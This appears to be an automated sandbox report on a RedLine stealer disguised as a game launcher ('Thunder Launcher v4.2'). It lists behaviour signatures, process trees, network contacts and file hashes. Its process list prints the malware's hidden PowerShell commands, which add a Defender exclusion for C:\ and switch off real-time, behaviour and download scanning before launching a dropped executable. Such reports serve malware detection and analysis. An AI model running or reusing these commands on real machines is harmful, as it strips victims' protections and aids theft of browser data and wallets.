Analysis Overview
Threat Level: Known bad
The file https://goo.su/xQHo was found to be: Known bad.
Malicious Activity Summary
RedLine
RedLine payload
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Executes dropped EXE
Reads user/profile data of web browsers
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-14 14:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-14 14:33
Reported
2024-07-14 14:37
Platform
win10v2004-20240709-en
Max time kernel
96s
Max time network
204s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1720967645459.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1636 set thread context of 4652 | N/A | C:\Users\Admin\AppData\Local\Temp\1720967645459.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://goo.su/xQHo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe22cf46f8,0x7ffe22cf4708,0x7ffe22cf4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5528 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe
"C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe"
C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe
"C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Start-Process "C:\Users\Admin\AppData\Local\Temp\/1720967645459.exe"'}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process C:\Users\Admin\AppData\Local\Temp\/1720967645459.exe
C:\Users\Admin\AppData\Local\Temp\1720967645459.exe
"C:\Users\Admin\AppData\Local\Temp\1720967645459.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | goo.su | udp |
| US | 172.67.139.105:443 | goo.su | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 105.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| US | 8.8.8.8:53 | 145.77.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| DE | 88.198.89.4:80 | 88.198.89.4 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| US | 8.8.8.8:53 | 4.89.198.88.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | o0.u2024.icu | udp |
| FI | 95.217.245.123:443 | o0.u2024.icu | tcp |
| US | 8.8.8.8:53 | 123.245.217.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1790c766c15938258a4f9b984cf68312 |
| SHA1 | 15c9827d278d28b23a8ea0389d42fa87e404359f |
| SHA256 | 2e3978bb58c701f3c6b05de9349b7334a194591bec7bcf73f53527dc0991dc63 |
| SHA512 | 2682d9c60c9d67608cf140b6ca4958d890bcbc3c8a8e95fcc639d2a11bb0ec348ca55ae99a5840e1f50e5c5bcf3e27c97fc877582d869d98cc4ea3448315aafb |
\??\pipe\LOCAL\crashpad_4408_GBKPOKGKNHNKOIUH
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8dc45b70cbe29a357e2c376a0c2b751b |
| SHA1 | 25d623cea817f86b8427db53b82340410c1489b2 |
| SHA256 | 511cfb6bedbad2530b5cc5538b6ec2184fc4f85947ba4c8166d0bb9f5fe2703a |
| SHA512 | 3ce0f52675feb16d6e62aae1c50767da178b93bdae28bacf6df3a2f72b8cc75b09c5092d9065e0872e5d09fd9ffe0c6931d6ae1943ddb1927b85d60659ef866e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 766815394ec267c2326059e3dbc23cd5 |
| SHA1 | f1f0fe419b29305a631c7591d0f376bf7c1cee80 |
| SHA256 | a6f370ab89678b2f7a172ae05007c8cf9fc3491f6fab1890bb3e0d7491db08d7 |
| SHA512 | cf764847de9d9696ac99439f71890431dee815821304117a78b8549d71e69effbfd822aa2767087eae335201e529c52ebac99d1fcc04947a46527b9a5b6b11bf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8f34b4bb777c1a0986c47a9a997f9c90 |
| SHA1 | f35b2fa6873ec2ff50be5bebb949acf2064602f7 |
| SHA256 | ab9772ed963566e5f085686165a6e5f4901d2de6c5c3024571c77df51bb9737e |
| SHA512 | 327f683487c1a8672b311979fa05cec0d9b690ad965dde3d1e550e8073763b6c2ce9997867154b9492f5a384178594be200a0d9d301708c71867ee480b61e5b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2b4cbab8701d4200290de14bbe77e77e |
| SHA1 | 561dcd7361045ed84248bb3ce031934ece40ed09 |
| SHA256 | d5cefbef2dfcfbbb7a2feb72351bdbd2a6f12ecc90e349da745089202c9ae8f1 |
| SHA512 | f66d1bb75f737fe47608b48f4e82c1c73961d70e9ce9cf7338d5ba653109a82863c135ac5979c19818e415989571193726ca31e4cfabae60cd0e23321a9334c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5b77ea6614486fa9082661f1f7d37c27 |
| SHA1 | 6e51bf491e35a6659694e62ca8dd27cdc30c8d2a |
| SHA256 | da899b1ce0fc127cdacfe489d2dc211eb94cefa71cf87ed849697fa43194acdb |
| SHA512 | c672ca111f9c50e7a15ca6153c46aab6f07e701dda225c4490e637e74322a89e53b49d267a71a13aaf5e309b21dc9e0328e7b1aac1565fe6085a5984b8768f9c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 06e4538e1224a04a8a3763fd371bc44a |
| SHA1 | 89444b13d31eda3780050e1aea12c902a5e723d2 |
| SHA256 | 36dc28b1f8b3de65b761150c373fbe441868b97d81e7b55c263735e1b6d20126 |
| SHA512 | e35a762d413aec5b6de7e6c658dd41daa28c2513bcd6a360306b0d6512c7dffa083ea4bd37b215d4fc78287eb33a33e953af029263f75874d40019eecc50513d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | f59173bd6bae4225216d91afe48b6017 |
| SHA1 | 9231eee8b25e96dcc0d58267cab3cc12130b82d9 |
| SHA256 | 00f46a4416df2f1d9af4fdf0fe9765ae0fa62fa34c590243b002da927d1ba9dc |
| SHA512 | c17a4d40f409dc874fd77b0e9fff36602fb7cc640868ee877a12819e01169fac3a15fdf21a9d06a128c2352046c6d9545b51544b7997c2123a9d2c8bac88cc7b |
memory/2316-155-0x0000000000400000-0x0000000000420000-memory.dmp
memory/4348-185-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/4348-193-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/4348-227-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/4348-229-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/4348-256-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/4348-255-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/2456-259-0x0000000002D90000-0x0000000002DC6000-memory.dmp
memory/2456-260-0x00000000056B0000-0x0000000005CD8000-memory.dmp
memory/4784-262-0x0000000005D20000-0x0000000005D86000-memory.dmp
memory/4784-263-0x0000000005D90000-0x0000000005DF6000-memory.dmp
memory/4784-261-0x0000000005400000-0x0000000005422000-memory.dmp
memory/4784-264-0x0000000005E40000-0x0000000006194000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rfnnphm5.aiw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4360-302-0x00000000061C0000-0x000000000620C000-memory.dmp
memory/4360-301-0x00000000061A0000-0x00000000061BE000-memory.dmp
memory/836-305-0x0000000006D20000-0x0000000006DB6000-memory.dmp
memory/836-307-0x0000000006030000-0x0000000006052000-memory.dmp
memory/836-306-0x0000000005F60000-0x0000000005F7A000-memory.dmp
memory/2456-308-0x0000000007980000-0x0000000007F24000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2436b635cfbbcb083b5b822bbbd1766f |
| SHA1 | 3c685c7d704905eb2ebe8868d1c4fbf77a260df5 |
| SHA256 | 4b1be1a64fd793be2dcbf17aadbf17efe219564e988c85c8113d58028cdd0c54 |
| SHA512 | 99cc64e67999f6c1e65cb6e9062a30bd7fa133a11230e28aaa4a01b7f05ea7e48ffc3c727c7eabd55d53be505d8a97c29181839b8977fa81a41cb9eb7e88b21f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Powershell.exe.log
| MD5 | def65711d78669d7f8e69313be4acf2e |
| SHA1 | 6522ebf1de09eeb981e270bd95114bc69a49cda6 |
| SHA256 | aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c |
| SHA512 | 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ab9e666fbf81d1bade718a9d090b3cc8 |
| SHA1 | 336d4418791cf3a3a43747b2cbce64d27e6f9eb2 |
| SHA256 | ab9b8fb9bda51953b5639dcb82b2ab5169277f9f30e801c3959d7db6337b19ea |
| SHA512 | ad77405dd1dd5a5100df00d4f92aa11a075b32be8e10fee633fcb8338f21dc11edeb4b7a1274dd48d8f2e468d816486aad033f8270fe9d1aacce4048bd2c0b98 |
memory/3032-330-0x0000000005A20000-0x0000000005D74000-memory.dmp
memory/3032-360-0x000000006EA40000-0x000000006EA8C000-memory.dmp
memory/3032-359-0x0000000007160000-0x0000000007192000-memory.dmp
memory/3032-370-0x00000000071A0000-0x00000000071BE000-memory.dmp
memory/3032-371-0x00000000071C0000-0x0000000007263000-memory.dmp
memory/4052-372-0x000000006EA40000-0x000000006EA8C000-memory.dmp
memory/4816-383-0x000000006EA40000-0x000000006EA8C000-memory.dmp
memory/4240-393-0x000000006EA40000-0x000000006EA8C000-memory.dmp
memory/3032-394-0x0000000007930000-0x0000000007FAA000-memory.dmp
memory/3032-404-0x0000000007370000-0x000000000737A000-memory.dmp
memory/3032-405-0x00000000074F0000-0x0000000007501000-memory.dmp
memory/4052-407-0x0000000007470000-0x000000000747E000-memory.dmp
memory/4052-408-0x0000000007480000-0x0000000007494000-memory.dmp
memory/4052-409-0x0000000007570000-0x000000000758A000-memory.dmp
memory/4052-410-0x0000000007550000-0x0000000007558000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c71a8dc614d33487d936e8dc24c16c14 |
| SHA1 | 08c231d3f620af564102c38d588f1b9cf88c1b22 |
| SHA256 | de2bdf4372ec3d859d2d34d8bf18566318c71e828bf765253e0442e2544645c6 |
| SHA512 | 9e49ce3152ed1a992b8b0c3e47cf083499cc73ad7a5310455d1eb7abcdba8fb4910cf926633aabde8ef7780d80812298d72537b575c916ca7af6cc6737f7d7f3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 03d69955495ed2d4ed4c66035227ffb5 |
| SHA1 | 89bc196457ca1307fa4a6f6d7aaf0bc96b017063 |
| SHA256 | e207712d8b59f3f25846a7f0df052cbf731ca9a8f203e0ab621b26cc64ce3c3e |
| SHA512 | de04d9fcfd8e053884a786d73237bc77d8d545f8f6b10a4672bf774a3d378b6626c419013e5c4b7be657466dd5695b22f902a4007b341e2d58415fde8e9bf06a |
memory/4348-434-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/4348-439-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/3468-446-0x0000000005FB0000-0x0000000006304000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b193dba84e0315043c23544303b6ab6b |
| SHA1 | 0ffc2d7f2cde07d85d92f513efc1736eb4cccf15 |
| SHA256 | 0e9369af5430d970e568d31495d042e36a7f0f4d0c01303fd444372bc7946850 |
| SHA512 | a8b95d6912ae6fb4942a24b6aadb18d875b5ba38ec779f2fbe8227c62f9580df0ea856e6e3507a5c3279694f431d0c1791ab35331d197741b93ed4c90cefbfe5 |
memory/3468-452-0x0000000006C40000-0x0000000006C8C000-memory.dmp
memory/460-463-0x0000000005D20000-0x0000000006074000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d5129ceb34356797ee4592ade484f308 |
| SHA1 | 603405f89b7ac1f18c7fbdbcc64e490a43809219 |
| SHA256 | cdd9c0a823e8e20d2523be31ac4637088e6e518aac3fd2a6d5a622bd3ce45e67 |
| SHA512 | 6cd350d22f361eb401225154951cd597a1f1e10a9776305182b5c77cae6193c9da8e54b15c2beadaaedea75c70be34460396bf917d4286958915a0db3c6372ae |
memory/460-465-0x00000000063B0000-0x00000000063FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1720967645459.exe
| MD5 | b4415b066e4dac6fb6849d0237bcdcf9 |
| SHA1 | d089566c069035f0f4ba147984d738114ba6ee90 |
| SHA256 | 3b30eb80b02910f592f5aa93e22af80b5e178785484e24b975892c0403073506 |
| SHA512 | 23291fbd5ff5e201209e9d034bbc87108b535cdec4a97b33e7934f974730eddecb4806d107518d1ec0a311d842a41b575eb8264d2ca23952c5337e97c0b4dc26 |
memory/4652-469-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4652-470-0x00000000062E0000-0x00000000068F8000-memory.dmp
memory/4652-471-0x0000000005D10000-0x0000000005D22000-memory.dmp
memory/4652-472-0x0000000005E40000-0x0000000005F4A000-memory.dmp
memory/4652-473-0x0000000006B00000-0x0000000006B3C000-memory.dmp
memory/4652-474-0x0000000006B40000-0x0000000006B8C000-memory.dmp
memory/4652-475-0x0000000006E80000-0x0000000007042000-memory.dmp
memory/4652-476-0x0000000007580000-0x0000000007AAC000-memory.dmp
memory/4652-477-0x0000000007260000-0x00000000072F2000-memory.dmp
memory/4652-478-0x00000000070D0000-0x0000000007146000-memory.dmp
memory/4652-479-0x0000000006E50000-0x0000000006E6E000-memory.dmp
memory/4652-480-0x00000000071A0000-0x00000000071F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
| MD5 | 5d3da8e9ab09ced1e70bbdb7f08d6d7a |
| SHA1 | 6c775119468cf2708e56763950eafb58dae0a3f4 |
| SHA256 | 3a3dfe5f88d485cd08342a9aab67f9332afb309830ec74e86d13f10e985b87dc |
| SHA512 | 1caca15c1653fe34e83e69ae730d8d84ea57baa042fb203166dc2167130e0420862faae41942bf9a0fb1a09dbefacd2a519661cc19c4e6fe88a9d8d601fc70b6 |